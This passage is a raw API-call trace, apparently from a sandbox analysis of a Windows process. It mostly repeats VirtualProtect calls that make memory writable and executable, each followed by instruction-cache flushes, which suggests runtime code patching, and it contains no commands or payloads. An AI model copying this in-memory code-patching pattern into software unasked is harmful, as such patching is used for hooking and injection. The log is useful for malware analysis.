lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.606] GetCurrentProcess () returned 0xffffffff [0093.606] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0093.606] GetCurrentProcess () returned 0xffffffff [0093.606] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0093.606] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.607] GetCurrentProcess () returned 0xffffffff [0093.607] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0093.607] GetCurrentProcess () returned 0xffffffff [0093.607] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0093.607] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.608] GetCurrentProcess () returned 0xffffffff [0093.608] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0093.608] GetCurrentProcess () returned 0xffffffff [0093.608] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0093.608] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.609] GetCurrentProcess () returned 0xffffffff [0093.609] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0093.609] GetCurrentProcess () returned 0xffffffff [0093.609] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0093.609] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.609] GetCurrentProcess () returned 0xffffffff [0093.610] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0093.610] GetCurrentProcess () returned 0xffffffff [0093.610] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0093.610] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.610] GetCurrentProcess () returned 0xffffffff [0093.610] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0093.610] GetCurrentProcess () returned 0xffffffff [0093.610] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0093.610] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.611] GetCurrentProcess () returned 0xffffffff [0093.611] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0093.611] GetCurrentProcess () returned 0xffffffff [0093.611] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0093.611] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.612] GetCurrentProcess () returned 0xffffffff [0093.612] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0093.612] GetCurrentProcess () returned 0xffffffff [0093.612] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0093.612] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.613] GetCurrentProcess () returned 0xffffffff [0093.613] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0093.613] GetCurrentProcess () returned 0xffffffff [0093.613] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0093.613] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.614] GetCurrentProcess () returned 0xffffffff [0093.614] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0093.614] GetCurrentProcess () returned 0xffffffff [0093.614] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0093.614] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.615] GetCurrentProcess () returned 0xffffffff [0093.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0093.615] GetCurrentProcess () returned 0xffffffff [0093.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0093.615] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.615] GetCurrentProcess () returned 0xffffffff [0093.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0093.615] GetCurrentProcess () returned 0xffffffff [0093.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0093.615] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.616] GetCurrentProcess () returned 0xffffffff [0093.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0093.616] GetCurrentProcess () returned 0xffffffff [0093.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0093.616] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.617] GetCurrentProcess () returned 0xffffffff [0093.617] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0093.617] GetCurrentProcess () returned 0xffffffff [0093.617] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0093.617] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.618] GetCurrentProcess () returned 0xffffffff [0093.618] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0093.618] GetCurrentProcess () returned 0xffffffff [0093.618] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0093.618] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.619] GetCurrentProcess () returned 0xffffffff [0093.619] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0093.619] GetCurrentProcess () returned 0xffffffff [0093.619] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0093.619] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.619] GetCurrentProcess () returned 0xffffffff [0093.620] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0093.620] GetCurrentProcess () returned 0xffffffff [0093.620] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0093.620] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.620] GetCurrentProcess () returned 0xffffffff [0093.620] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0093.620] GetCurrentProcess () returned 0xffffffff [0093.621] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0093.621] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.621] GetCurrentProcess () returned 0xffffffff [0093.621] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0093.621] GetCurrentProcess () returned 0xffffffff [0093.621] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0093.622] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.622] GetCurrentProcess () returned 0xffffffff [0093.622] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0093.622] GetCurrentProcess () returned 0xffffffff [0093.622] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0093.622] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.634] GetCurrentProcess () returned 0xffffffff [0093.634] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0093.644] GetAsyncKeyState (vKey=3) returned 0 [0093.644] CRetailMalloc_Alloc () returned 0xf4b2e00 [0093.649] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.649] memcpy (in: _Dst=0xb2a5270, _Src=0x197748, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.651] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.651] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.651] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.651] memcpy (in: _Dst=0xb2a516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.670] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.682] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.683] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.683] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.683] memcpy (in: _Dst=0xb2a516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.685] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.692] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.692] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.692] memcpy (in: _Dst=0xb2a5168, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.692] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.692] CRetailMalloc_Realloc () returned 0xb51a090 [0093.692] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.692] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.692] memcpy (in: _Dst=0xb2a5168, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.693] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.693] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.693] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.693] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.693] memcpy (in: _Dst=0xb2a516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.694] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.694] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.694] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.694] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.694] memcpy (in: _Dst=0xb2a516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.695] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.695] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.695] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.695] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.696] memcpy (in: _Dst=0xb2a516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.696] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.696] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.696] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.696] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.696] memcpy (in: _Dst=0xb2a516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.697] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.697] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.697] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.697] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.697] memcpy (in: _Dst=0xb2a516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.697] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.697] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.697] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.698] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.698] memcpy (in: _Dst=0xb2a516c, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.698] memcpy (in: _Dst=0xb2a5170, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0093.698] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.698] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.698] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.698] memcpy (in: _Dst=0xb2a5168, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.698] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.699] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.699] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.699] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.699] memcpy (in: _Dst=0xb2a516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.699] memcpy (in: _Dst=0xb2a5168, _Src=0x197748, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.703] CRetailMalloc_Alloc () returned 0xca15150 [0093.703] memcpy (in: _Dst=0xca15150, _Src=0x0, _Size=0x0 | out: _Dst=0xca15150) returned 0xca15150 [0093.703] memcpy (in: _Dst=0xf4b309c, _Src=0x1977e4, _Size=0x18 | out: _Dst=0xf4b309c) returned 0xf4b309c [0093.703] memcpy (in: _Dst=0xf4b30de, _Src=0xca15150, _Size=0x2 | out: _Dst=0xf4b30de) returned 0xf4b30de [0093.703] CRetailMalloc_Realloc () returned 0xf4b2e00 [0093.703] CRetailMalloc_Free () returned 0x1 [0093.703] CRetailMalloc_Free () returned 0x1 [0093.703] GetCurrentProcess () returned 0xffffffff [0093.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0093.703] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.704] GetCurrentProcess () returned 0xffffffff [0093.704] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0093.704] GetCurrentProcess () returned 0xffffffff [0093.704] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0093.704] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.705] GetCurrentProcess () returned 0xffffffff [0093.705] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0093.705] GetCurrentProcess () returned 0xffffffff [0093.705] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0093.705] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.706] GetCurrentProcess () returned 0xffffffff [0093.706] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0093.706] GetCurrentProcess () returned 0xffffffff [0093.706] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0093.706] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.707] GetCurrentProcess () returned 0xffffffff [0093.707] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0093.707] GetCurrentProcess () returned 0xffffffff [0093.707] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0093.707] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.708] GetCurrentProcess () returned 0xffffffff [0093.708] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0093.708] GetCurrentProcess () returned 0xffffffff [0093.708] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0093.708] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.709] GetCurrentProcess () returned 0xffffffff [0093.709] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0093.709] GetCurrentProcess () returned 0xffffffff [0093.709] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0093.709] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.709] GetCurrentProcess () returned 0xffffffff [0093.710] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0093.710] GetCurrentProcess () returned 0xffffffff [0093.710] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0093.710] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.710] GetCurrentProcess () returned 0xffffffff [0093.710] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0093.710] GetCurrentProcess () returned 0xffffffff [0093.710] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0093.711] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.712] GetCurrentProcess () returned 0xffffffff [0093.712] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0093.712] GetCurrentProcess () returned 0xffffffff [0093.713] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0093.713] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.713] GetCurrentProcess () returned 0xffffffff [0093.713] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0093.713] GetCurrentProcess () returned 0xffffffff [0093.713] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0093.713] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.714] GetCurrentProcess () returned 0xffffffff [0093.714] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0093.714] GetCurrentProcess () returned 0xffffffff [0093.714] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0093.714] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.715] GetCurrentProcess () returned 0xffffffff [0093.715] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0093.715] GetCurrentProcess () returned 0xffffffff [0093.715] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0093.715] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.716] GetCurrentProcess () returned 0xffffffff [0093.716] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0093.716] GetCurrentProcess () returned 0xffffffff [0093.716] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0093.716] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.717] GetCurrentProcess () returned 0xffffffff [0093.717] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0093.717] GetCurrentProcess () returned 0xffffffff [0093.717] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0093.717] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.718] GetCurrentProcess () returned 0xffffffff [0093.718] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0093.718] GetCurrentProcess () returned 0xffffffff [0093.718] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0093.718] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.718] GetCurrentProcess () returned 0xffffffff [0093.718] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0093.718] GetCurrentProcess () returned 0xffffffff [0093.718] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0093.718] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.719] GetCurrentProcess () returned 0xffffffff [0093.719] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0093.719] GetCurrentProcess () returned 0xffffffff [0093.719] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0093.719] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.720] GetCurrentProcess () returned 0xffffffff [0093.720] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0093.720] GetCurrentProcess () returned 0xffffffff [0093.720] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0093.720] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.721] GetCurrentProcess () returned 0xffffffff [0093.721] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, 